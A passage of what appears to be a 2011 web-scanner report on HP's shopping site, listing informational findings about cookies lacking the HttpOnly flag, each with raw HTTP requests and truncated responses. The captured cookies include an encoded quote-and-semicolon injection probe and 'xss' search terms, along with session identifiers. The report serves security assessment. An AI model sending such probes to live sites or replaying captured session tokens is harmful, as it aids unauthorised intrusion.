Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fgo%25252Fmicrosoftoffers_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252Fpromo_tile%25252F3%25252Fdt_promo_tile3_buy_a__1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.63. http://www.shopping.hp.com/go/touchpadfaqs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/touchpadfaqs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlktjNuS3QxxMC3vvlfcdgKY0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=1x1x4

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkti9uU0Ql8NyDuvVDYcwSc0ic%3D; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 129613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.64. http://www.shopping.hp.com/printer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.65. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; 
HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:46 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=LpBWT6LW1LTjGTZRyfm0fbKTmkGKngPQLj0bRtv4yPG1nnDMyvwk!-1039217636; expires=Friday, 23-Sep-2011 01:10:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 230201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.66. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; 
HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:07:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjt2W2A5xOi3rslfedwOX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.67. http://www.shopping.hp.com/supplies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.68. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/add_to_cart.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/add_to_cart.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 75
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; HP_EBUS_HP_CLICKS=4x16x6476; EMID=; s_depth=19; 
hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=%5B%5BB%5D%5D

add_prod_id=TD367AA%2523ABA&ADD=ADD&page=CWBAB-pdp&qty=1&nextPage=cart_ajax

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:46 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=Bj3CT6LW2h81vmYs4rKFwGvrvRv3Kq3sJ7yDyjLqDQQYnvZbs21L!-1039217636; expires=Friday, 23-Sep-2011 01:10:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7778


<form name="revisePCPC" method="post" action="http://www.shopping.hp.com/webapp/shopping/cto.do">
<input type="hidden" name="conversationId" value="">
<input type="hidden" name="c
...[SNIP]...

4.69. http://www.shopping.hp.com/webapp/shopping/can.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

